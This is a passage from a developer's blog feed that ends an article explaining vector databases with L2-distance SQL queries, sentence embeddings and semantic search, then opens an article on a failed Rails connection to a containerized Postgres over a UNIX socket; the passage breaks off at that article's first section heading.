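&lt;p&gt;Finding the nearest neighbour is then mostly a matter of sorting by that distance. Here is a minimal sketch against the &lt;code&gt;vectors&lt;/code&gt; table from above, assuming nothing beyond the &lt;code&gt;&amp;lt;-&amp;gt;&lt;/code&gt; operator we have already used; the &lt;code&gt;distance&lt;/code&gt; alias is just an illustrative name.&lt;/p&gt;
&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;-- Rank the stored vectors by L2 distance to [3,4] and keep only the closest
SELECT vectors.id,
       vectors.vector,
       vectors.vector &amp;lt;-&amp;gt; &#39;[3,4]&#39; AS distance
FROM vectors
ORDER BY vectors.vector &amp;lt;-&amp;gt; &#39;[3,4]&#39;
LIMIT 1;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With only our two rows stored, &lt;code&gt;[4,4]&lt;/code&gt; should come back, since its distance of 1 is the smaller of the two.&lt;/p&gt;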
&lt;h2 id=&quot;but%2C-why%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#but%2C-why%3F&quot;&gt;But, Why?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Up until now we&#39;ve been considering our vectors in a relatively abstract space, where &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; had no particular meaning other than it was closer to &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(4,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span 
class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; than it was to &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mo&gt;−&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(-4,-4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;−&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;.&lt;/p&gt;
&lt;p&gt;But we can take these vectors out of their happy abstract space and soak them in all kinds of meaning with a process called embedding.&lt;/p&gt;
&lt;p&gt;It&#39;s easiest to think of an embedding model as, well, pure magic at this point. Think of it as a ready-made &#39;text to vectors&#39; delivery service. For our purposes we&#39;ll use one called &lt;a href=&quot;https://huggingface.co/sentence-transformers/all-MiniLM-L6-v2&quot;&gt;&lt;code&gt;all-MiniLM-L6-v2&lt;/code&gt;&lt;/a&gt;, which takes a text input and returns a 384-dimensional vector. This model was tuned on 1 billion sentence pairs, and as part of that training it picked up some ability to place sentences with similar meanings close to each other across those many dimensions. If two sentences are closely located within 384-dimensional space, the model has decided they share semantic meaning.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We won&#39;t be venturing into the LLM-world in this article, so no worrying about ChatGPT, Gemini or Claude. But one common use case for vector databases right now is to enrich a prompt with some memory and/or context. So you might store all your relevant internal documents in a vector database, and then pull out some similar text before sending your prompt &lt;em&gt;with&lt;/em&gt; those results to the LLM.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let&#39;s throw a few sentences at &lt;code&gt;all-MiniLM-L6-v2&lt;/code&gt;:&lt;/p&gt;
&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;sentences &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Crystal Palace finished 10th in the premier league in 2023/24&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Man City finished 1st in the premier league in 2023/24&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Man City finished 1st in the premier league in 2022/23&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Brighton finished 11th in the premier league&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Preston finished 10th in the championship&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Cucumbers taste good when pickled&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Ginger tastes good when pickled&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Milk does not taste good when pickled&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Cats have four legs&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Dogs have four legs&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token string&quot;&gt;&quot;Humans have two legs&quot;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We&#39;ve got 11 sentences bucketed into three categories: &lt;span style=&quot;color: var(--amaranth-pink)&quot;&gt;football finishing positions&lt;/span&gt;, &lt;span style=&quot;color: var(--aquamarine)&quot;&gt;pickled foods&lt;/span&gt; and &lt;span style=&quot;color: var(--uranian-blue)&quot;&gt;limbed animals&lt;/span&gt;.&lt;/p&gt;
&lt;p&gt;It&#39;s hard for a tiny human brain to visualise 384-dimensional space, but I still want to have a look at these embeddings. We can use the &lt;a href=&quot;https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding&quot;&gt;t-SNE algorithm&lt;/a&gt; (again, for now, let&#39;s just consider the implementation details pure magic) to bring that 384-dimensional data down to two dimensions, and then visualise the results.&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/tsne.svg&quot; alt=&quot;using the tsne embedding to display our multi-dimensional data on a 2D plane&quot; /&gt;
&lt;p&gt;We can see that the model has semantically grouped all the &lt;span style=&quot;color: var(--amaranth-pink)&quot;&gt;football finishing positions&lt;/span&gt;, &lt;span style=&quot;color: var(--aquamarine)&quot;&gt;pickled foods&lt;/span&gt; and &lt;span style=&quot;color: var(--uranian-blue)&quot;&gt;limbed animals&lt;/span&gt; close to one another. These vectors have meaning!&lt;/p&gt;
&lt;p&gt;Now, what if we create an embedding for another sentence: &lt;code&gt;Did palace win the premier league?&lt;/code&gt; Imagine this takes the place of our &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;4&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(3,4)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; vector from earlier, and now we want to find the closest vector stored in our database. We can once again go back to calculating the L2 distance for the nearest result.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If you&#39;re interested in going further, note that we&#39;re heading into a territory known as semantic search, which is one of the most exciting use cases for a vector database.&lt;/p&gt;
&lt;/blockquote&gt;
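&lt;p&gt;In database terms, that lookup could be sketched roughly like this. The &lt;code&gt;sentences&lt;/code&gt; table, its column names and the &lt;code&gt;nearest_sentence&lt;/code&gt; statement are all hypothetical, and the embeddings themselves are assumed to be produced outside the database by the model and inserted as 384-element vectors.&lt;/p&gt;
&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;-- Hypothetical table: one row per sentence, stored next to its 384-dimensional embedding
CREATE TABLE sentences (
    id BIGSERIAL PRIMARY KEY,
    sentence TEXT,
    embedding vector(384)
);

-- Hypothetical prepared statement: $1 is the embedding of the question being asked
PREPARE nearest_sentence (vector) AS
    SELECT sentence
    FROM sentences
    ORDER BY embedding &amp;lt;-&amp;gt; $1
    LIMIT 1;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Running the prepared statement with &lt;code&gt;EXECUTE&lt;/code&gt;, passing the question&#39;s embedding as its one argument, would then return the stored sentence with the smallest L2 distance.&lt;/p&gt;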
&lt;p&gt;The response? &lt;code&gt;Crystal Palace finished 10th in the premier league in 2023/24&lt;/code&gt;. Oh well. Maybe next year.&lt;/p&gt;
&lt;hr class=&quot;footnotes-sep&quot; /&gt;
&lt;section class=&quot;footnotes&quot;&gt;
&lt;ol class=&quot;footnotes-list&quot;&gt;
&lt;li id=&quot;fn1&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;Vectors are &lt;em&gt;technically&lt;/em&gt; not points and they aren&#39;t held in a fixed position in space. In this article, let&#39;s just say we will anchor our points relative to the origin &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;mo stretchy=&quot;false&quot;&gt;(&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;mo separator=&quot;true&quot;&gt;,&lt;/mo&gt;&lt;mn&gt;0&lt;/mn&gt;&lt;mo stretchy=&quot;false&quot;&gt;)&lt;/mo&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;(0,0)&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:1em;vertical-align:-0.25em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mopen&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mpunct&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.16666666666666666em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mclose&quot;&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; of our coordinate system and we&#39;ll use the terms interchangeably for the sake of simplicity. Another term for these is position vectors. &lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fnref1&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li id=&quot;fn2&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;This is also known as Euclidean distance. There are other distance measures too, such as cosine distance and L1/Manhattan distance. Cosine distance seems to be extremely popular, but I personally find L2 the most straightforward to visualise. &lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fnref2&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li id=&quot;fn3&quot; class=&quot;footnote-item&quot;&gt;&lt;p&gt;OK, quickly, one more thing: you could &lt;em&gt;also&lt;/em&gt; look at this as if it was &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;msup&gt;&lt;mn&gt;7&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;msup&gt;&lt;mn&gt;8&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;≈&lt;/mo&gt;&lt;mn&gt;10.6&lt;/mn&gt;&lt;msup&gt;&lt;mn&gt;3&lt;/mn&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;7^2 + 8^2 &#92;approx 10.63^2&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.897438em;vertical-align:-0.08333em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;7&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; 
style=&quot;height:0.8141079999999999em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;8&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;≈&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.8141079999999999em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;6&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord 
mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, or generalised further into Pythagoras&#39; famous &lt;span class=&quot;katex&quot;&gt;&lt;span class=&quot;katex-mathml&quot;&gt;&lt;math xmlns=&quot;http://www.w3.org/1998/Math/MathML&quot;&gt;&lt;semantics&gt;&lt;mrow&gt;&lt;msup&gt;&lt;mi&gt;a&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;msup&gt;&lt;mi&gt;b&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;msup&gt;&lt;mi&gt;c&lt;/mi&gt;&lt;mn&gt;2&lt;/mn&gt;&lt;/msup&gt;&lt;/mrow&gt;&lt;annotation encoding=&quot;application/x-tex&quot;&gt;a^2 + b^2 = c^2&lt;/annotation&gt;&lt;/semantics&gt;&lt;/math&gt;&lt;/span&gt;&lt;span class=&quot;katex-html&quot; aria-hidden=&quot;true&quot;&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.897438em;vertical-align:-0.08333em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;a&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mbin&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2222222222222222em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; 
style=&quot;height:0.8141079999999999em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;b&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mrel&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;mspace&quot; style=&quot;margin-right:0.2777777777777778em;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;base&quot;&gt;&lt;span class=&quot;strut&quot; style=&quot;height:0.8141079999999999em;vertical-align:0em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;mord&quot;&gt;&lt;span class=&quot;mord mathnormal&quot;&gt;c&lt;/span&gt;&lt;span class=&quot;msupsub&quot;&gt;&lt;span class=&quot;vlist-t&quot;&gt;&lt;span class=&quot;vlist-r&quot;&gt;&lt;span class=&quot;vlist&quot; style=&quot;height:0.8141079999999999em;&quot;&gt;&lt;span style=&quot;top:-3.063em;margin-right:0.05em;&quot;&gt;&lt;span class=&quot;pstrut&quot; style=&quot;height:2.7em;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;sizing reset-size6 size3 mtight&quot;&gt;&lt;span class=&quot;mord mtight&quot;&gt;2&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;, which blows my mind. Triangles are everywhere! 
&lt;a href=&quot;https://martingaston.dev/articles/what-is-a-vector-database-actually-doing/#fnref3&quot; class=&quot;footnote-backref&quot;&gt;↩︎&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/section&gt;
</content>
  </entry>
  <entry>
    <title>Why Can&#39;t Rails Use UNIX Sockets With Containerized Postgres?</title>
    <link href="https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/"/>
    <updated>2023-07-15T00:00:00Z</updated>
    <id>https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/</id>
    <content xml:lang="en" type="html">&lt;p&gt;I wasn&#39;t paying attention while setting up a work &lt;a href=&quot;https://rubyonrails.org/&quot;&gt;Rails&lt;/a&gt; project recently (my level of Rails proficiency is firmly &lt;em&gt;winging it&lt;/em&gt;) and I bumped into this:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# bundle manages ruby dependencies, rake is a ruby build tool&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;token comment&quot;&gt;# this command is saying: hey, please run the task that sets up my database&lt;/span&gt;&lt;br /&gt;$ bundle &lt;span class=&quot;token builtin class-name&quot;&gt;exec&lt;/span&gt; rake db:setup&lt;br /&gt;connection to server on socket &lt;span class=&quot;token string&quot;&gt;&quot;/tmp/.s.PGSQL.5432&quot;&lt;/span&gt; failed: No such &lt;span class=&quot;token function&quot;&gt;file&lt;/span&gt; or directory&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I spend a good amount of time blowing up databases, sometimes on purpose but mostly by accident, so for my development workflow I tend to run instances of Postgres in containers.&lt;/p&gt;
&lt;p&gt;Most projects run just fine: they dial &lt;code&gt;localhost&lt;/code&gt; on port &lt;code&gt;5432&lt;/code&gt; and the good times roll. In this instance, however, I was ignoring &lt;em&gt;this&lt;/em&gt; project&#39;s &lt;code&gt;README.md&lt;/code&gt;, which advocated a local install of the wonderful &lt;a href=&quot;https://postgresapp.com/&quot;&gt;Postgres.app&lt;/a&gt;. Postgres runs as a server, which can be a little fussy in terms of setup, and Postgres.app simplifies the whole process into a standard macOS application.&lt;/p&gt;
&lt;p&gt;Still: what was going on here? &lt;em&gt;socket&lt;/em&gt;? &lt;code&gt;/tmp/.s.PGSQL.5432&lt;/code&gt;? No such &lt;code&gt;file&lt;/code&gt;? What is this word soup? Aren&#39;t we supposed to be connecting to a database? I had a perfectly good Postgres container primed and waiting on port &lt;code&gt;5432&lt;/code&gt;! No, I have not read the project&#39;s README!&lt;/p&gt;
&lt;p&gt;Let&#39;s unwind a little. Rails conventionally stores settings relating to the database in &lt;code&gt;config/database.yml&lt;/code&gt;, so that was a natural first destination. The section for &lt;code&gt;host&lt;/code&gt; was commented out, and featured this context: &lt;code&gt;Connect on a TCP socket. Omitted by default since the client uses a domain socket that doesn&#39;t need configuration.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The most straightforward thing to do for my workflow would be to uncomment that host line and set it to connect over TCP to &lt;code&gt;localhost:5432&lt;/code&gt;. That&#39;s actually the &lt;em&gt;only&lt;/em&gt; thing you can really do in this situation (read: when using macOS, and without some arcane trickery) but if you&#39;re anything like me you&#39;re ready to take an excruciatingly long (and fun, I hope!) journey to figure out &lt;em&gt;why&lt;/em&gt; that is.&lt;/p&gt;
&lt;h2 id=&quot;socket-to-me&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/why-cant-rails-use-unix-sockets-with-containerized-postgres/#socket-to-me&quot;&gt;Socket to Me&lt;/a&gt;&lt;/h2&gt;
